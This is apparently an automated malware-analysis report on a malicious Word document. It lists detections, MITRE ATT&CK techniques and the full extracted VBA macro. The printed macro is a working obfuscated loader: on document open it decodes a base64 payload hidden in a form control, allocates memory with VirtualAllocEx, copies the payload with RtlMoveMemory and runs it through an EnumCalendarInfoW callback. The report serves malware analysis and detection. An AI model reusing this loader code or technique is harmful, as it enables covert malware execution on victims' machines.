MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. Heuristics indicate the use of VirtualAlloc and GetObject, suggesting memory allocation and object manipulation for payload execution. The ClamAV detection name 'Doc.Dropper.Agent-1820965' strongly implies a dropper functionality, where the macro likely downloads and executes a secondary payload. No specific family could be identified, but the behavior is consistent with a macro-based downloader.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-1820965 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1820965
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set wdApp = GetObject(, "Word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim harmony As Long -
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12521 bytes |
SHA-256: 426b37a9119a79d46fd789aa516c632213ba43969f50c7d70546f32db2601930 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub upper()
Dim InitialCaps As Range
Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
End:=ActiveDocument.Words(3).End)
InitialCaps.Case = wdUpperCase
End Sub
Private Sub Document_Open()
Dim harmony As Long
Dim adlumia As Integer
freeway = "concordiam"
obsessivecompulsive = LCase$("MaN") & Right$("athensufacture", 8)
postal
clutter = 75
carboy = 93
If clutter + carboy < 10 Then
clutter = LCase$("cAse") & LCase$("HARDEN") & Mid("scorpionidaedsharping", 12, 2)
subscribed = subscribed
entellus = Right$("beastsbo", 2) & LCase$("oKcA") & LCase$("SE")
Else
nestling = nestling / 252
carboy = 88
End If
End Sub
Function halfadozen(eaglet)
Dim cotta As Variant
Dim sempiternal As Variant
Dim costerman As Long
formalin costerman, ByVal VarPtr(eaglet) + 8, 4
Dim roan As String
Dim vibration As Integer
Dim catabiosis As Long
intervallo = 0
outgate = -1
decrepit = 126 + 35 + 71 - 232
circumgyration = Abs(82.382)
mini = "amulet"
admiring = 4096
twothirds = cortically(ByVal outgate, ByVal decrepit, 7382, admiring, 64)
circumgyration = Int(225.87)
formalin catabiosis, ByVal VarPtr(twothirds) + 8, 4
circumgyration = Round(379.1297)
formalin ByVal catabiosis, ByVal costerman, 5538
slot = 9
While slot < 14
slot = slot + 1
subscribed = mini
nestling = Int(454.1064)
Wend
halfadozen = catabiosis
End Function
Sub postal()
Dim account As String
Dim gorge As Byte
Set butcherbird = stilted.nothofagus.BoundValue("Tab2")
wobble = butcherbird.ControlTipText
hereinafter = 126 + 7242
doggedness = Right(wobble, hereinafter)
basidiomycota = arado.hunc(doggedness)
gansu = 94
chorus = 62
If gansu + chorus < 30 Then
gansu = Right$("conspicioussen", 3) & Right$("asphyxiatesualism", 7)
mini = "tringa"
cavaliere = LCase$("Mu") & Left("sefulindisposed", 5)
Else
subscribed = mini
chorus = 17
End If
homegrown = "consul"
grapple = Right$("searchint", 3) & Mid("catkinertidinside", 7, 5) & Right$("bewareal", 2)
#If VBA6 And Win64 Then
Dim alps As String
Dim bead As arcturus
Dim germanspeaking As LongPtr
bead.elseifstatement = 119 + 60 - 179
Dim cameroon As Integer
#Else
Dim loathe As Integer
bead = 0
Dim defatigation As Long
Dim germanspeaking As Long
#End If
marblewood = 0
drumlin = "swollen"
topping = 94 - 60 + 4062
adventurousness = 8
While adventurousness < 12
adventurousness = adventurousness + 1
mini = mini
mini = subscribed
Wend
amsinckia = "shocking"
princesfeather = "curvilinear"
apothecaries = "reinstate"
hurlyburly = 8
While hurlyburly < 11
hurlyburly = hurlyburly + 1
circumgyration = nestling / 265
circumgyration = Round(291.843)
Wend
dimly = basidiomycota
snowdrift = "dracocephalum"
germanspeaking = halfadozen(dimly)
driblets = Mid("anthropophagouscoupitprop", 16, 3) & UCase$("nTERC") & UCase$("Heck")
einstein = "hyperglycemia"
#If VBA6 And Win64 Then
Dim stultiloquy As Variant
grassy = "pining"
efflorescence = "meaningless"
direction = "scatterbrained"
expressions = 37 + 66 - 42 + 1219
#ElseIf Win32 Then
diligent = "phonics"
pegology = "fesse"
diastrophism = 21 + 485
expressions = diastrophism + 3171
#End If
Dim fief As Variant
Dim akee As String
Dim smallscale As Long
smallscale = 2048
Dim letun As Long
letun = germanspeaking + expressions
Dim manufactory As Long
manufactory = 1
ajar = coward(letun, smallscale, manufactory, manufactory)
For lilliput = 37 To 57
suturing = 57
subscribed = subscribed
tensiometer = Left("brafflatus", 2) & UCase$("EATh")
tensiometer = UCase$("aL") & Mid("electroencephalogramtarmaisonnette", 21, 3)
Next lilliput
End Sub
Attribute VB_Name = "arado"
'I hope that I don't bore you while I whine about it
#If VBA6 And Win64 Then
'so if it all fails just throw it back in my face and bury me
Public Type arcturus
'as soon as I escape there's more stagnant bullsshit
elseifstatement As LongPtr
'I hope you won't be saddened while I cry about it
End Type
'I keep telling myself that there's something more
Public Declare PtrSafe Function atriplex Lib "user32" Alias "SetParent" (ByVal accountantship As LongPtr, ByVal bellwort As LongPtr,toots As LongPtr) As LongPtr
'I'd like to think there's more something more
Public Declare PtrSafe Function extroverted Lib "user32" Alias "GetUpdateRect" (hylactophryne As LongPtr, diapensiales As LongPtr,pine As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal occidental As Any, ByVal jottings As Any, ByVal rove As Any, ByVal impassible As Any) As LongPtr
'I can't watch things further complicate
Public Declare PtrSafe Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (precedent As Any, guardhouse As Any, ByVal notification As LongPtr)
'I'd like to think there's more something more
Public Declare PtrSafe Function absentmindedness Lib "user32" Alias "EndPaint" (albification As LongPtr,mediate As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public Declare PtrSafe Function cortically Lib "kernel32" Alias "VirtualAllocEx" (biennial As LongPtr, iberomesornis As LongPtr, ByVal illicitness As LongPtr, ByVal midon As LongPtr, ByVal incontinence As LongPtr) As LongPtr
'on focusing destractions tear me open
Public Declare PtrSafe Function namtar Lib "kernel32" Alias "Sleep" (etymology As LongPtr)
'I keep telling myself that there's something more
Public Declare PtrSafe Function ladder Lib "user32" Alias "OpenClipboard" (alike As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit
'I hope you won't be saddened while I cry about it
#Else
'I hope you won't be saddened while I cry about it
Public Declare Function french Lib "user32" Alias "EndPaint" (nidicolous As Long, sapsago As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (bruder As Any, obreptitious As Any, ByVal ballad As Long)
'have mercy please God erase us
Public Declare Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal cymbid As Any, ByVal ambiversion As Any, ByVal mineralized As Any, ByVal flood As Any) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function diabetic Lib "user32" Alias "GetUpdateRect" (omnifarious As Long, droves As Long, chitchat As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function cortically Lib "kernel32" Alias "VirtualAllocEx" (anthologist As Long, calloused As Long, ByVal capillarity As Long, ByVal drapery As Long, ByVal chromosomal As Long) As Long
'all the thoughts in my head are constantly .. haunting me
Public Declare Function abc Lib "user32" Alias "OpenClipboard" (telegraphic As Long) As Boolean
'I'd like to think there's more something more
Public Declare Function motacilla Lib "user32" Alias "SetParent" (ByVal surrejoinder As Long, ByVal unaffected As Long, flimsily As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function brosmius Lib "kernel32" Alias "Sleep" (adjuvat As Long)
'I'm lost in this place it's such a waste
'I can't watch things further complicate
#End If
'so if it all fails just throw it back in my face and bury me
Function macleaya(facilitative, discredited)
macleaya = facilitative * discredited
End Function
Function isohel(fervor)
isohel = AscW(fervor)
End Function
Function incidentally(dicto, bos)
incidentally = dicto \ bos
End Function
Function annoyed(dabble, pisiform)
annoyed = dabble And pisiform
End Function
Function hunc(opportune) As String
circumgyration = circumgyration * 3
Dim despise(63) As Long
Dim abstinence(63) As Long
mini = "both"
Dim engorge() As Byte
Dim anaplasmosis(5525) As Byte
Dim whether(63) As Long
Dim stub As Long
Dim seines As Integer
Dim chalks(255) As Byte
Dim benzofuran As Long
Dim fearfully As Integer
Dim muove As String
Dim proturberance As Long
Dim weakkneed As Long
Dim tellurium As String
Dim eighteen As String
cemented = 53 + 70 + 3973
etat = 44 + 65236
Dim grip As String
Dim circumjacent As Long
highwayman = 16711680
dominantly = 123 - 11 + 143
streptolysin = 92 + 65444
marguerite = 126 - 62
agriculture = 63
cooperation = 262144
anachronism = 115 - 23 + 257956
Dim cimabue As Byte
tierce = 1 + 4031
adsorbed = 81 + 16514991
cacophony = 101 - 25 + 180
Dim favillous As Integer
Dim inguishable(7367) As Byte
curtained = 109 + 40 - 75 + 7294
For jaws = 1 To curtained
footlocker = Mid(opportune, jaws, 1)
tlingit = "chemiluminescence"
towhee = "design"
tensimeter = "amity"
alumina = isohel(footlocker)
inguishable(jaws - 1) = alumina
Next
Dim stratus As Long
wire = 79
nondiscrimination = 54
If wire + nondiscrimination < 15 Then
wire = LCase$("bA") & "rbec" & Right$("austromancyued", 3)
subscribed = mini
hectic = UCase$("wa") & Right$("apliterder", 4)
Else
circumgyration = Round(80.334)
nondiscrimination = 86
End If
danaea = 7367
brocaded = 35
For apt = 0 To danaea
inguishable(apt) = inguishable(apt) + 5
Next apt
cloudliness = 85
catching = 51
If cloudliness + catching < 32 Then
cloudliness = "me" & Mid("boundlessurtcuckoldom", 10, 3)
mini = "egotism"
amethyst = Right$("landgravebro", 3) & "nchos" & Left("pasmgly", 4)
Else
circumgyration = circumgyration And 422
catching = 101
End If
fearfully = 0
deific = 64 + 117 - 59
aftereffect = 255
For stub = 0 To aftereffect
If (stub >= 65) And (stub <= 90) Then
chalks(stub) = stub - 65
ElseIf (stub >= 97) And (stub <= 122) Then
chalks(stub) = stub - 71
ElseIf (stub >= 48) And (stub <= 57) Then
chalks(stub) = stub + 4
ElseIf stub = 43 Then
chalks(stub) = 62
ElseIf stub = 47 Then
chalks(stub) = 63
End If
Next stub
For stub = 0 To 63
despise(stub) = macleaya(stub, marguerite)
whether(stub) = macleaya(stub, cemented)
abstinence(stub) = macleaya(stub, cooperation)
Next stub
For bargaining = 30 To 61
astriction = 61
nestling = Fix(213.1021)
uti = UCase$("gaR") & Right$("inexorableambulla", 7)
uti = UCase$("DE") & UCase$("lIcTo")
Next bargaining
engorge = inguishable
aristarchy = 4
goasyouplease = 50
brotulidae = 74
If goasyouplease + brotulidae < 23 Then
goasyouplease = LCase$("de") & Right$("duckscolon", 5) & LCase$("IZATIOn")
circumgyration = Fix(469.712)
circumnavigate = LCase$("bA") & LCase$("RKeE") & UCase$("per")
Else
circumgyration = Fix(189.837)
brotulidae = 55
End If
divinities = 3
subscribed = mini
circumgyration = Round(462.418)
bichona = divinities + 1
painim = 113 + 101 - 212
For weakkneed = 0 To danaea
miraculous = engorge(weakkneed)
unoriginal = engorge(weakkneed + 2)
benzofuran = abstinence(chalks(miraculous)) _
+ whether(chalks(engorge(weakkneed + 1))) + despise(chalks(unoriginal)) + chalks(engorge(weakkneed + divinities))
stub = annoyed(benzofuran, highwayman)
anaplasmosis(proturberance) = incidentally(stub, streptolysin)
stub = annoyed(benzofuran, etat)
anaplasmosis(proturberance + 1) = incidentally(stub, cacophony)
anaplasmosis(proturberance + painim) = annoyed(benzofuran, dominantly)
proturberance = proturberance + painim + 1
weakkneed = weakkneed + 3
Next
hunc = anaplasmosis
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Attribute VB_Name = "stilted"
Attribute VB_Base = "0{41F33EDB-7F26-4FE8-904E-14EDAF37791B}{3F8CCC1E-8E9B-4E9E-82A7-D367D9AD41E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.